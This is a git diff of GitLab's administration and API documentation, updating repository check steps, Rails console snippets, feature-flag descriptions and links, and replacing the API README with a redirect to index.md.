minutes before the check result is visible on the +project page in the Admin Area. If the checks fail, see [what to do](#what-to-do-if-a-check-failed). This setting is off by default, because it can cause many false alarms. -## Periodic checks +## Enable periodic checks + +Instead of checking repositories manually, GitLab can be configured to run the checks periodically: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Repository** (`/admin/application_settings/repository`). +1. Expand the **Repository maintenance** section. +1. Enable **Enable repository checks**. -When enabled, GitLab periodically runs a repository check on all project -repositories and wiki repositories in order to detect data corruption. -A project is checked no more than once per month. If any projects -fail their repository checks all GitLab administrators receive an email -notification of the situation. This notification is sent out once a week, -by default, midnight at the start of Sunday. Repositories with known check -failures can be found at `/admin/projects?last_repository_check_failed=1`. +When enabled, GitLab periodically runs a repository check on all project repositories and wiki +repositories to detect possible data corruption. A project is checked no more than once per month. -## Disabling periodic checks +If any projects fail their repository checks, all GitLab administrators receive an email +notification of the situation. By default, this notification is sent out once a week at midnight at +the start of Sunday. -You can disable the periodic checks on the **Settings** page of the Admin Area. +Repositories with known check failures can be found at +`/admin/projects?last_repository_check_failed=1`. ## What to do if a check failed -If the repository check fails for some repository you should look up the error -in the [`repocheck.log` file](logs.md#repochecklog) on disk: +If a repository check fails, locate the error in the [`repocheck.log` file](logs.md#repochecklog) on +disk at: -- `/var/log/gitlab/gitlab-rails` for Omnibus GitLab installations -- `/home/git/gitlab/log` for installations from source +- `/var/log/gitlab/gitlab-rails` for Omnibus GitLab installations. +- `/home/git/gitlab/log` for installations from source. -If the periodic repository check causes false alarms, you can clear all repository check states by: +If periodic repository checks cause false alarms, you can clear all repository check states: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Settings > Repository** (`/admin/application_settings/repository`). 1. Expand the **Repository maintenance** section. 1. Select **Clear all repository checks**. -## Run a check manually +## Run a check using the command line -[`git fsck`](https://git-scm.com/docs/git-fsck) is a read-only check that you can run -manually against the repository on the [Gitaly server](gitaly/index.md). +You can run [`git fsck`](https://git-scm.com/docs/git-fsck) using the command line on repositories +on [Gitaly servers](gitaly/index.md). To locate the repositories: -- For Omnibus GitLab installations, repositories are stored by default in - `/var/opt/gitlab/git-data/repositories`. -- [Identify the subdirectory that contains the repository](repository_storage_types.md#from-project-name-to-hashed-path) +1. Go to the storage location for repositories. For Omnibus GitLab installations, repositories are + stored by default in the `/var/opt/gitlab/git-data/repositories` directory. +1. [Identify the subdirectory that contains the repository](repository_storage_types.md#from-project-name-to-hashed-path) that you need to check. To run a check (for example): @@ -65,5 +72,5 @@ sudo /opt/gitlab/embedded/bin/git -C /var/opt/gitlab/git-data/repositories/@hash ``` You can also run [Rake tasks](raketasks/check.md#repository-integrity) for checking Git -repositories, which can be used to run `git fsck` against all repositories and generate -repository checksums, as a way to compare repositories on different servers. +repositories, which can be used to run `git fsck` against all repositories and generate repository +checksums, as a way to compare repositories on different servers. diff --git a/doc/administration/repository_storage_paths.md b/doc/administration/repository_storage_paths.md index a1391f3e0ed..68f351e737a 100644 --- a/doc/administration/repository_storage_paths.md +++ b/doc/administration/repository_storage_paths.md @@ -147,13 +147,13 @@ can choose where new repositories are stored: 1. Select **Save changes**. Each repository storage path can be assigned a weight from 0-100. When a new project is created, -these weights are used to determine the storage location the repository is created on. The higher -the weight of a given repository storage path relative to other repository storages paths, the more -often it is chosen. That is, `(storage weight) / (sum of all weights) * 100 = chance %`. +these weights are used to determine the storage location the repository is created on. - +The higher the weight of a given repository storage path relative to other repository storages +paths, the more often it is chosen. That is, +`(storage weight) / (sum of all weights) * 100 = chance %`. ## Move repositories -To move a repository to a different repository storage (for example, from `default` to `storage2`), use the +To move a repository to a different repository storage (for example, from `default` to `storage2`), use the same process as [migrating to Gitaly Cluster](gitaly/praefect.md#migrate-to-gitaly-cluster). diff --git a/doc/administration/restart_gitlab.md b/doc/administration/restart_gitlab.md index 5f7f08f4ecf..b8f09b00773 100644 --- a/doc/administration/restart_gitlab.md +++ b/doc/administration/restart_gitlab.md @@ -85,7 +85,7 @@ sudo gitlab-ctl reconfigure Reconfiguring GitLab should occur in the event that something in its configuration (`/etc/gitlab/gitlab.rb`) has changed. -When you run this command, [Chef](https://www.chef.io/products/chef-infra/), the underlying configuration management +When you run this command, [Chef](https://www.chef.io/products/chef-infra), the underlying configuration management application that powers Omnibus GitLab, makes sure that all things like directories, permissions, and services are in place and in the same shape that they were initially shipped. diff --git a/doc/administration/server_hooks.md b/doc/administration/server_hooks.md index f67bf676a61..2a431d17774 100644 --- a/doc/administration/server_hooks.md +++ b/doc/administration/server_hooks.md @@ -34,7 +34,7 @@ Note the following about server hooks: administrators are able to complete these tasks. If you don't have file system access, see possible alternatives such as: - [Webhooks](../user/project/integrations/webhooks.md). - - [GitLab CI/CD](../ci/README.md). + - [GitLab CI/CD](../ci/index.md). - [Push Rules](../push_rules/push_rules.md), for a user-configurable Git hook interface. - Server hooks aren't replicated to [Geo](geo/index.md) secondary nodes. @@ -142,7 +142,7 @@ The following set of environment variables are available to server hooks. |:---------------------|:----------------------------------------------------------------------------| | `GL_ID` | GitLab identifier of user that initiated the push. For example, `user-2234` | | `GL_PROJECT_PATH` | (GitLab 13.2 and later) GitLab project path | -| `GL_PROTOCOL` | (GitLab 13.2 and later) Protocol used with push | +| `GL_PROTOCOL` | (GitLab 13.2 and later) Protocol used for this change. One of: `http` (Git Push using HTTP), `ssh` (Git Push using SSH), or `web` (all other actions). | | `GL_REPOSITORY` | `project-<id>` where `id` is the ID of the project | | `GL_USERNAME` | GitLab username of the user that initiated the push | diff --git a/doc/administration/troubleshooting/debug.md b/doc/administration/troubleshooting/debug.md index 6861cdcde4e..031f44b1f9f 100644 --- a/doc/administration/troubleshooting/debug.md +++ b/doc/administration/troubleshooting/debug.md @@ -111,7 +111,7 @@ an SMTP server, but you're not seeing mail delivered. Here's how to check the se ``` In the example above, the SMTP server is configured for the local machine. If this is intended, you may need to check your local mail - logs (e.g. `/var/log/mail.log`) for more details. + logs (for example, `/var/log/mail.log`) for more details. 1. Send a test message via the console. @@ -119,7 +119,7 @@ an SMTP server, but you're not seeing mail delivered. Here's how to check the se irb(main):003:0> Notify.test_email('youremail@email.com', 'Hello World', 'This is a test message').deliver_now ``` - If you do not receive an e-mail and/or see an error message, then check + If you do not receive an email and/or see an error message, then check your mail server settings. ## Advanced Issues @@ -224,7 +224,7 @@ gitlab_rails['env'] = { } ``` -For source installations, set the environment variable. +For source installations, set the environment variable. Refer to [Puma Worker timeout](https://docs.gitlab.com/omnibus/settings/puma.html#worker-timeout). [Reconfigure](../restart_gitlab.md#omnibus-gitlab-reconfigure) GitLab for the changes to take effect. @@ -237,7 +237,7 @@ are concerned about affecting others during a production system, you can run a separate Rails process to debug the issue: 1. Log in to your GitLab account. -1. Copy the URL that is causing problems (e.g. `https://gitlab.com/ABC`). +1. Copy the URL that is causing problems (for example, `https://gitlab.com/ABC`). 1. Create a Personal Access Token for your user (User Settings -> Access Tokens). 1. Bring up the [GitLab Rails console.](../operations/rails_console.md#starting-a-rails-console-session) 1. At the Rails console, run: @@ -258,12 +258,12 @@ separate Rails process to debug the issue: ### GitLab: API is not accessible This often occurs when GitLab Shell attempts to request authorization via the -[internal API](../../development/internal_api.md) (e.g., `http://localhost:8080/api/v4/internal/allowed`), and +[internal API](../../development/internal_api.md) (for example, `http://localhost:8080/api/v4/internal/allowed`), and something in the check fails. There are many reasons why this may happen: -1. Timeout connecting to a database (e.g., PostgreSQL or Redis) +1. Timeout connecting to a database (for example, PostgreSQL or Redis) 1. Error in Git hooks or push rules -1. Error accessing the repository (e.g., stale NFS handles) +1. Error accessing the repository (for example, stale NFS handles) To diagnose this problem, try to reproduce the problem and then see if there is a Unicorn worker that is spinning via `top`. Try to use the `gdb` @@ -285,5 +285,5 @@ The output in `/tmp/puma.txt` may help diagnose the root cause. ## More information -- [Debugging Stuck Ruby Processes](https://blog.newrelic.com/engineering/debugging-stuck-ruby-processes-what-to-do-before-you-kill-9/) +- [Debugging Stuck Ruby Processes](https://newrelic.com/blog/engineering/debugging-stuck-ruby-processes-what-to-do-before-you-kill-9/) - [Cheat sheet of using GDB and Ruby processes](gdb-stuck-ruby.txt) diff --git a/doc/administration/troubleshooting/defcon.md b/doc/administration/troubleshooting/defcon.md index 7cae6ea1c8f..1b263f70b46 100644 --- a/doc/administration/troubleshooting/defcon.md +++ b/doc/administration/troubleshooting/defcon.md @@ -10,7 +10,7 @@ type: reference This document describes a feature that allows you to disable some important but computationally expensive parts of the application to relieve stress on the database during an ongoing downtime. -## `ci_queueing_disaster_recovery` +## `ci_queueing_disaster_recovery_disable_fair_scheduling` This feature flag, if temporarily enabled, disables fair scheduling on shared runners. This can help to reduce system resource usage on the `jobs/request` endpoint @@ -20,6 +20,16 @@ Side effects: - In case of a large backlog of jobs, the jobs are processed in the order they were put in the system, instead of balancing the jobs across many projects. + +## `ci_queueing_disaster_recovery_disable_quota` + +This feature flag, if temporarily enabled, disables enforcing CI minutes quota +on shared runners. This can help to reduce system resource usage on the +`jobs/request` endpoint by significantly reducing the computations being +performed. + +Side effects: + - Projects which are out of quota will be run. This affects only jobs created during the last hour, as prior jobs are canceled by a periodic background worker (`StuckCiJobsWorker`). diff --git a/doc/administration/troubleshooting/elasticsearch.md b/doc/administration/troubleshooting/elasticsearch.md index d04ce23188f..79295856da8 100644 --- a/doc/administration/troubleshooting/elasticsearch.md +++ b/doc/administration/troubleshooting/elasticsearch.md @@ -53,7 +53,7 @@ graph TD; B5 --> |No| B7 B7 --> B8 B{Is GitLab using<br>Elasticsearch for<br>searching?} - B1[Check Admin Area > Integrations<br>to ensure the settings are correct] + B1[From the Admin Area, select<br>Integrations from the left<br>sidebar to ensure the settings<br>are correct.] B2[Perform a search via<br>the rails console] B3[If all settings are correct<br>and it still doesn't show Elasticsearch<br>doing the searches, escalate<br>to GitLab support.] B4[Perform<br>the same search via the<br>Elasticsearch API] @@ -196,7 +196,9 @@ Troubleshooting search result issues is rather straight forward on Elasticsearch The first step is to confirm GitLab is using Elasticsearch for the search function. To do this: -1. Confirm the integration is enabled in **Admin Area > Settings > General**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > General**, and then confirm the + integration is enabled. 1. Confirm searches use Elasticsearch by accessing the rails console (`sudo gitlab-rails console`) and running the following commands: diff --git a/doc/administration/troubleshooting/gitlab_rails_cheat_sheet.md b/doc/administration/troubleshooting/gitlab_rails_cheat_sheet.md index 92070a86a0d..08755dd3285 100644 --- a/doc/administration/troubleshooting/gitlab_rails_cheat_sheet.md +++ b/doc/administration/troubleshooting/gitlab_rails_cheat_sheet.md @@ -275,7 +275,24 @@ integration active: p = Project.find_by_sql("SELECT p.id FROM projects p LEFT JOIN services s ON p.id = s.project_id WHERE s.type = 'JiraService' AND s.active = true") p.each do |project| - project.jira_service.update_attribute(:password, '<your-new-password>') + project.jira_integration.update_attribute(:password, '<your-new-password>') +end +``` + +### Bulk update push rules for _all_ projects + +For example, enable **Check whether the commit author is a GitLab user** and **Do not allow users to remove Git tags with `git push`** checkboxes, and create a filter for allowing commits from a specific e-mail domain only: + +``` ruby +Project.find_each do |p| + pr = p.push_rule || PushRule.new(project: p) + # Check whether the commit author is a GitLab user + pr.member_check = true + # Do not allow users to remove Git tags with `git push` + pr.deny_delete_tag = true + # Commit author's email + pr.author_email_regex = '@domain\.com$' + pr.save! end ``` @@ -286,9 +303,9 @@ To change all Jira project to use the instance-level integration settings: 1. In a Rails console: ```ruby - jira_service_instance_id = JiraService.find_by(instance: true).id - JiraService.where(active: true, instance: false, template: false, inherit_from_id: nil).find_each do |service| - service.update_attribute(:inherit_from_id, jira_service_instance_id) + jira_integration_instance_id = Integrations::Jira.find_by(instance: true).id + Integrations::Jira.where(active: true, instance: false, template: false, inherit_from_id: nil).find_each do |integration| + integration.update_attribute(:inherit_from_id, jira_integration_instance_id) end ``` @@ -331,10 +348,10 @@ end puts "#{artifact_storage} bytes" ``` -### Identify deploy keys associated with blocked and non-member users +### Identify deploy keys associated with blocked and non-member users -When the user who created a deploy key is blocked or removed from the project, the key -can no longer be used to push to protected branches in a private project (see [issue #329742](https://gitlab.com/gitlab-org/gitlab/-/issues/329742)). +When the user who created a deploy key is blocked or removed from the project, the key +can no longer be used to push to protected branches in a private project (see [issue #329742](https://gitlab.com/gitlab-org/gitlab/-/issues/329742)). The following script identifies unusable deploy keys: ```ruby @@ -350,7 +367,7 @@ DeployKeysProject.with_write_access.find_each do |deploy_key_mapping| # can_push_for_ref? tests if deploy_key can push to default branch, which is likely to be protected can_push = access_checker.can_do_action?(:push_code) can_push_to_default = access_checker.can_push_for_ref?(project.repository.root_ref) - + next if access_checker.allowed? && can_push && can_push_to_default if user.nil? || user.id == ghost_user_id @@ -557,7 +574,7 @@ User.billable.count ::HistoricalData.max_historical_user_count ``` -Using cURL and jq (up to a max 100, see the [pagination docs](../../api/README.md#pagination)): +Using cURL and jq (up to a max 100, see the [pagination docs](../../api/index.md#pagination)): ```shell curl --silent --header "Private-Token: ********************" \ @@ -814,12 +831,12 @@ build.dependencies.each do |d| { puts "status: #{d.status}, finished at: #{d.fin completed: #{d.complete?}, artifacts_expired: #{d.artifacts_expired?}, erased: #{d.erased?}" } ``` -### Try CI service +### Try CI integration ```ruby p = Project.find_by_full_path('<project_path>') m = project.merge_requests.find_by(iid: ) -m.project.try(:ci_service) +m.project.try(:ci_integration) ``` ### Validate the `.gitlab-ci.yml` @@ -1125,6 +1142,33 @@ registry = Geo::PackageFileRegistry.find(registry_id) registry.replicator.send(:download) ``` +#### Verify package files on the secondary manually + +This will iterate over all package files on the secondary, looking at the +`verification_checksum` stored in the database (which came from the primary) +and then calculate this value on the secondary to check if they match. This +won't change anything in the UI: + +```ruby +# Run on secondary +status = {} + +Packages::PackageFile.find_each do |package_file| + primary_checksum = package_file.verification_checksum + secondary_checksum = Packages::PackageFile.hexdigest(package_file.file.path) + verification_status = (primary_checksum == secondary_checksum) + + status[verification_status.to_s] ||= [] + status[verification_status.to_s] << package_file.id +end + +# Count how many of each value we get +status.keys.each {|key| puts "#{key} count: #{status[key].count}"} + +# See the output in its entirety +status +``` + ### Repository types newer than project/wiki repositories - `SnippetRepository` @@ -1155,31 +1199,31 @@ registry = Geo::SnippetRepositoryRegistry.find(registry_id) registry.replicator.send(:sync_repository) ``` -### Generate usage ping +## Generate Service Ping -#### Generate or get the cached usage ping +### Generate or get the cached Service Ping ```ruby Gitlab::UsageData.to_json ``` -#### Generate a fresh new usage ping +### Generate a fresh new Service Ping -This will also refresh the cached usage ping displayed in the admin area +This will also refresh the cached Service Ping displayed in the admin area ```ruby Gitlab::UsageData.to_json(force_refresh: true) ``` -#### Generate and print +### Generate and print -Generates usage ping data in JSON format. +Generates Service Ping data in JSON format. ```shell rake gitlab:usage_data:generate ``` -#### Generate and send usage ping +### Generate and send Service Ping Prints the metrics saved in `conversational_development_index_metrics`. @@ -1219,7 +1263,7 @@ Open the rails console (`gitlab rails c`) and run the following command to see a ApplicationSetting.last.attributes ``` -Among other attributes, in the output you will notice that all the settings available in the [Elasticsearch Integration page](../../integration/elasticsearch.md), like: `elasticsearch_indexing`, `elasticsearch_url`, `elasticsearch_replicas`, `elasticsearch_pause_indexing`, etc. +Among other attributes, in the output you will notice that all the settings available in the [Elasticsearch Integration page](../../integration/elasticsearch.md), like: `elasticsearch_indexing`, `elasticsearch_url`, `elasticsearch_replicas`, `elasticsearch_pause_indexing`, and so on. #### Setting attributes diff --git a/doc/administration/troubleshooting/img/AzureAD-basic_SAML.png b/doc/administration/troubleshooting/img/AzureAD-basic_SAML.png Binary files differindex e86ad7572e8..7a0d83ab2dd 100644 --- a/doc/administration/troubleshooting/img/AzureAD-basic_SAML.png +++ b/doc/administration/troubleshooting/img/AzureAD-basic_SAML.png diff --git a/doc/administration/troubleshooting/img/AzureAD-claims.png b/doc/administration/troubleshooting/img/AzureAD-claims.png Binary files differindex aab92288704..576040be337 100644 --- a/doc/administration/troubleshooting/img/AzureAD-claims.png +++ b/doc/administration/troubleshooting/img/AzureAD-claims.png diff --git a/doc/administration/troubleshooting/img/azure_configure_group_claim.png b/doc/administration/troubleshooting/img/azure_configure_group_claim.png Binary files differindex 31df5fff625..9d8c5348273 100644 --- a/doc/administration/troubleshooting/img/azure_configure_group_claim.png +++ b/doc/administration/troubleshooting/img/azure_configure_group_claim.png diff --git a/doc/administration/troubleshooting/postgresql.md b/doc/administration/troubleshooting/postgresql.md index 341c6bfbc65..994c194c6db 100644 --- a/doc/administration/troubleshooting/postgresql.md +++ b/doc/administration/troubleshooting/postgresql.md @@ -55,7 +55,7 @@ This section is for links to information elsewhere in the GitLab documentation. - Including [troubleshooting](../postgresql/replication_and_failover.md#troubleshooting) `gitlab-ctl patroni check-leader` and PgBouncer errors. -- [Developer database documentation](../../development/README.md#database-guides), +- [Developer database documentation](../../development/index.md#database-guides), some of which is absolutely not for production use. Including: - Understanding EXPLAIN plans. diff --git a/doc/administration/troubleshooting/tracing_correlation_id.md b/doc/administration/troubleshooting/tracing_correlation_id.md index 7b9ce5c6d7b..1bb10e72290 100644 --- a/doc/administration/troubleshooting/tracing_correlation_id.md +++ b/doc/administration/troubleshooting/tracing_correlation_id.md @@ -27,7 +27,7 @@ activity with the site that you're visiting. See the links below for network mon documentation for some popular browsers. - [Network Monitor - Firefox Developer Tools](https://developer.mozilla.org/en-US/docs/Tools/Network_Monitor) -- [Inspect Network Activity In Chrome DevTools](https://developers.google.com/web/tools/chrome-devtools/network/) +- [Inspect Network Activity In Chrome DevTools](https://developer.chrome.com/docs/devtools/network) - [Safari Web Development Tools](https://developer.apple.com/safari/tools/) - [Microsoft Edge Network panel](https://docs.microsoft.com/en-us/microsoft-edge/devtools-guide-chromium/network/) diff --git a/doc/administration/whats-new.md b/doc/administration/whats-new.md index ae19e0f0341..d669d05e9f0 100644 --- a/doc/administration/whats-new.md +++ b/doc/administration/whats-new.md @@ -13,7 +13,7 @@ GitLab versions in the **What's new** feature. To access it: 1. Select **What's new** from the menu. The **What's new** describes new features available in multiple -[GitLab tiers](https://about.gitlab.com/pricing). While all users can see the +[GitLab tiers](https://about.gitlab.com/pricing/). While all users can see the feature list, the feature list is tailored to your subscription type: - Features only available to self-managed installations are not shown on GitLab.com. diff --git a/doc/api/README.md b/doc/api/README.md index c23a383c70f..5ab8653dc35 100644 --- a/doc/api/README.md +++ b/doc/api/README.md @@ -1,781 +1,8 @@ --- -stage: Create -group: Ecosystem -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: 'index.md' --- -# API Docs **(FREE)** +This document was moved to [another location](index.md). -Use the GitLab [REST](http://spec.openapis.org/oas/v3.0.3) API to automate GitLab. - -You can also use a partial [OpenAPI definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/api/openapi/openapi.yaml), -to test the API directly from the GitLab user interface. -Contributions are welcome. - -## Available API resources - -For a list of the available resources and their endpoints, see -[API resources](api_resources.md). - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an introduction and basic steps, see -[How to make GitLab API calls](https://www.youtube.com/watch?v=0LsMC3ZiXkA). - -## SCIM **(PREMIUM SAAS)** - -GitLab provides an [SCIM API](scim.md) that both implements -[the RFC7644 protocol](https://tools.ietf.org/html/rfc7644) and provides the -`/Users` endpoint. The base URL is `/api/scim/v2/groups/:group_path/Users/`. - -## GraphQL API - -A [GraphQL](graphql/index.md) API is available in GitLab. - -With GraphQL, you can make an API request for only what you need, -and it's versioned by default. - -GraphQL co-exists with the current v4 REST API. If we have a v5 API, this should -be a compatibility layer on top of GraphQL. - -There were some patenting and licensing concerns with GraphQL. However, these -have been resolved to our satisfaction. The reference implementations -were re-licensed under MIT, and the OWF license used for the GraphQL specification. - -When GraphQL is fully implemented, GitLab: - -- Can delete controller-specific endpoints. -- Will no longer maintain two different APIs. - -## Compatibility guidelines - -The HTTP API is versioned with a single number, which is currently `4`. This number -symbolizes the major version number, as described by [SemVer](https://semver.org/). -Because of this, backward-incompatible changes require this version number to -change. - -The minor version isn't explicit, which allows for a stable API -endpoint. New features can be added to the API in the same -version number. - -New features and bug fixes are released in tandem with GitLab. Apart -from incidental patch and security releases, GitLab is released on the 22nd of each -month. Major API version changes, and removal of entire API versions, are done in tandem -with major GitLab releases. - -All deprecations and changes between versions are in the documentation. -For the changes between v3 and v4, see the [v3 to v4 documentation](v3_to_v4.md). - -### Current status - -Only API version v4 is available. Version v3 was removed in -[GitLab 11.0](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/36819). - -## How to use the API - -API requests must include both `api` and the API version. The API -version is defined in [`lib/api.rb`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/api/api.rb). -For example, the root of the v4 API is at `/api/v4`. - -### Valid API request - -If you have a GitLab instance at `gitlab.example.com`: - -```shell -curl "https://gitlab.example.com/api/v4/projects" -``` - -The API uses JSON to serialize data. You don't need to specify `.json` at the -end of the API URL. - -### API request to expose HTTP response headers - -If you want to expose HTTP response headers, use the `--include` option: - -```shell -curl --include "https://gitlab.example.com/api/v4/projects" -HTTP/2 200 -... -``` - -This request can help you investigate an unexpected response. - -### API request that includes the exit code - -If you want to expose the HTTP exit code, include the `--fail` option: - -```shell script -curl --fail "https://gitlab.example.com/api/v4/does-not-exist" -curl: (22) The requested URL returned error: 404 -``` - -The HTTP exit code can help you diagnose the success or failure of your REST request. - -## Authentication - -Most API requests require authentication, or only return public data when -authentication isn't provided. When authentication is not required, the documentation -for each endpoint specifies this. For example, the -[`/projects/:id` endpoint](projects.md#get-single-project) does not require authentication. - -There are several ways you can authenticate with the GitLab API: - -- [OAuth2 tokens](#oauth2-tokens) -- [Personal access tokens](../user/profile/personal_access_tokens.md) -- [Project access tokens](../user/project/settings/project_access_tokens.md) -- [Session cookie](#session-cookie) -- [GitLab CI/CD job token](#gitlab-cicd-job-token) **(Specific endpoints only)** - -Project access tokens are supported by: - -- Self-managed GitLab Free and higher. -- GitLab SaaS Premium and higher. - -If you are an administrator, you or your application can authenticate as a specific user. -To do so, use: - -- [Impersonation tokens](#impersonation-tokens) -- [Sudo](#sudo) - -If authentication information is not valid or is missing, GitLab returns an error -message with a status code of `401`: - -```json -{ - "message": "401 Unauthorized" -} -``` - -### OAuth2 tokens - -You can use an [OAuth2 token](oauth2.md) to authenticate with the API by passing -it in either the `access_token` parameter or the `Authorization` header. - -Example of using the OAuth2 token in a parameter: - -```shell -curl "https://gitlab.example.com/api/v4/projects?access_token=OAUTH-TOKEN" -``` - -Example of using the OAuth2 token in a header: - -```shell -curl --header "Authorization: Bearer OAUTH-TOKEN" "https://gitlab.example.com/api/v4/projects" -``` - -Read more about [GitLab as an OAuth2 provider](oauth2.md). - -### Personal/project access tokens - -You can use access tokens to authenticate with the API by passing it in either -the `private_token` parameter or the `PRIVATE-TOKEN` header. - -Example of using the personal or project access token in a parameter: - -```shell -curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>" -``` - -Example of using the personal or project access token in a header: - -```shell -curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects" -``` - -You can also use personal or project access tokens with OAuth-compliant headers: - -```shell -curl --header "Authorization: Bearer <your_access_token>" "https://gitlab.example.com/api/v4/projects" -``` - -### Session cookie - -Signing in to the main GitLab application sets a `_gitlab_session` cookie. The -API uses this cookie for authentication if it's present. Using the API to -generate a new session cookie isn't supported. - -The primary user of this authentication method is the web frontend of GitLab -itself. The web frontend can use the API as the authenticated user to get a -list of projects without explicitly passing an access token. - -### GitLab CI/CD job token - -When a pipeline job is about to run, GitLab generates a unique token and injects it as the -[`CI_JOB_TOKEN` predefined variable](../ci/variables/predefined_variables.md). - -You can use a GitLab CI/CD job token to authenticate with specific API endpoints: - -- Packages: - - [Package Registry](../user/packages/package_registry/index.md). To push to the - Package Registry, you can use [deploy tokens](../user/project/deploy_tokens/index.md). - - [Container Registry](../user/packages/container_registry/index.md) - (the `$CI_REGISTRY_PASSWORD` is `$CI_JOB_TOKEN`). - - [Container Registry API](container_registry.md) (scoped to the job's project, when the `ci_job_token_scope` feature flag is enabled) -- [Get job artifacts](job_artifacts.md#get-job-artifacts). -- [Get job token's job](jobs.md#get-job-tokens-job). -- [Pipeline triggers](pipeline_triggers.md), using the `token=` parameter. -- [Release creation](releases/index.md#create-a-release). -- [Terraform plan](../user/infrastructure/index.md). - -The token has the same permissions to access the API as the user that triggers the -pipeline. Therefore, this user must be assigned to [a role that has the required privileges](../user/permissions.md). - -The token is valid only while the pipeline job runs. After the job finishes, you can't -use the token anymore. - -A job token can access a project's resources without any configuration, but it might -give extra permissions that aren't necessary. There is [a proposal](https://gitlab.com/groups/gitlab-org/-/epics/3559) -to redesign the feature for more strategic control of the access permissions. - -#### GitLab CI/CD job token security - -To make sure that this token doesn't leak, GitLab: - -- Masks the job token in job logs. -- Grants permissions to the job token only when the job is running. - -To make sure that this token doesn't leak, you should also configure -your [runners](../ci/runners/README.md) to be secure. Avoid: - -- Using Docker's `privileged` mode if the machines are re-used. -- Using the [`shell` executor](https://docs.gitlab.com/runner/executors/shell.html) when jobs - run on the same machine. - -If you have an insecure GitLab Runner configuration, you increase the risk that someone -tries to steal tokens from other jobs. - -### Impersonation tokens - -Impersonation tokens are a type of [personal access token](../user/profile/personal_access_tokens.md). -They can be created only by an administrator, and are used to authenticate with the -API as a specific user. - -Use impersonation tokens an alternative to: - -- The user's password or one of their personal access tokens. -- The [Sudo](#sudo) feature. The user's or administrator's password or token - may not be known, or may change over time. - -For more information, see the [users API](users.md#create-an-impersonation-token) -documentation. - -Impersonation tokens are used exactly like regular personal access tokens, and -can be passed in either the `private_token` parameter or the `PRIVATE-TOKEN` -header. - -#### Disable impersonation - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40385) in GitLab 11.6. - -By default, impersonation is enabled. To disable impersonation: - -**For Omnibus installations** - -1. Edit the `/etc/gitlab/gitlab.rb` file: - - ```ruby - gitlab_rails['impersonation_enabled'] = false - ``` - -1. Save the file, and then [reconfigure](../administration/restart_gitlab.md#omnibus-gitlab-reconfigure) - GitLab for the changes to take effect. - -To re-enable impersonation, remove this configuration, and then reconfigure -GitLab. - -**For installations from source** - -1. Edit the `config/gitlab.yml` file: - - ```yaml - gitlab: - impersonation_enabled: false - ``` - -1. Save the file, and then [restart](../administration/restart_gitlab.md#installations-from-source) - GitLab for the changes to take effect. - -To re-enable impersonation, remove this configuration, and then restart GitLab. - -### Sudo - -All API requests support performing an API request as if you were another user, -provided you're authenticated as an administrator with an OAuth or personal -access token that has the `sudo` scope. The API requests are executed with the -permissions of the impersonated user. - -As an [administrator](../user/permissions.md), pass the `sudo` parameter either -by using query string or a header with an ID or username (case insensitive) of -the user you want to perform the operation as. If passed as a header, the header -name must be `Sudo`. - -If a non administrative access token is provided, GitLab returns an error -message with a status code of `403`: - -```json -{ - "message": "403 Forbidden - Must be admin to use sudo" -} -``` - -If an access token without the `sudo` scope is provided, an error message is -be returned with a status code of `403`: - -```json -{ - "error": "insufficient_scope", - "error_description": "The request requires higher privileges than provided by the access token.", - "scope": "sudo" -} -``` - -If the sudo user ID or username cannot be found, an error message is -returned with a status code of `404`: - -```json -{ - "message": "404 User with ID or username '123' Not Found" -} -``` - -Example of a valid API request and a request using cURL with sudo request, -providing a username: - -```plaintext -GET /projects?private_token=<your_access_token>&sudo=username -``` - -```shell -curl --header "PRIVATE-TOKEN: <your_access_token>" --header "Sudo: username" "https://gitlab.example.com/api/v4/projects" -``` - -Example of a valid API request and a request using cURL with sudo request, -providing an ID: - -```plaintext -GET /projects?private_token=<your_access_token>&sudo=23 -``` - -```shell -curl --header "PRIVATE-TOKEN: <your_access_token>" --header "Sudo: 23" "https://gitlab.example.com/api/v4/projects" -``` - -## Status codes - -The API is designed to return different status codes according to context and -action. This way, if a request results in an error, you can get -insight into what went wrong. - -The following table gives an overview of how the API functions generally behave. - -| Request type | Description | -|---------------|-------------| -| `GET` | Access one or more resources and return the result as JSON. | -| `POST` | Return `201 Created` if the resource is successfully created and return the newly created resource as JSON. | -| `GET` / `PUT` | Return `200 OK` if the resource is accessed or modified successfully. The (modified) result is returned as JSON. | -| `DELETE` | Returns `204 No Content` if the resource was deleted successfully. | - -The following table shows the possible return codes for API requests. - -| Return values | Description | -|--------------------------|-------------| -| `200 OK` | The `GET`, `PUT` or `DELETE` request was successful, and the resource(s) itself is returned as JSON. | -| `204 No Content` | The server has successfully fulfilled the request, and there is no additional content to send in the response payload body. | -| `201 Created` | The `POST` request was successful, and the resource is returned as JSON. | -| `304 Not Modified` | The resource hasn't been modified since the last request. | -| `400 Bad Request` | A required attribute of the API request is missing. For example, the title of an issue is not given. | -| `401 Unauthorized` | The user isn't authenticated. A valid [user token](#authentication) is necessary. | -| `403 Forbidden` | The request isn't allowed. For example, the user isn't allowed to delete a project. | -| `404 Not Found` | A resource couldn't be accessed. For example, an ID for a resource couldn't be found. | -| `405 Method Not Allowed` | The request isn't supported. | -| `409 Conflict` | A conflicting resource already exists. For example, creating a project with a name that already exists. | -| `412` | The request was denied. This can happen if the `If-Unmodified-Since` header is provided when trying to delete a resource, which was modified in between. | -| `422 Unprocessable` | The entity couldn't be processed. | -| `429 Too Many Requests` | The user exceeded the [application rate limits](../administration/instance_limits.md#rate-limits). | -| `500 Server Error` | While handling the request, something went wrong on the server. | - -## Pagination - -GitLab supports the following pagination methods: - -- Offset-based pagination. This is the default method and is available on all endpoints. -- Keyset-based pagination. Added to selected endpoints but being - [progressively rolled out](https://gitlab.com/groups/gitlab-org/-/epics/2039). - -For large collections, for performance reasons we recommend keyset pagination -(when available) instead of 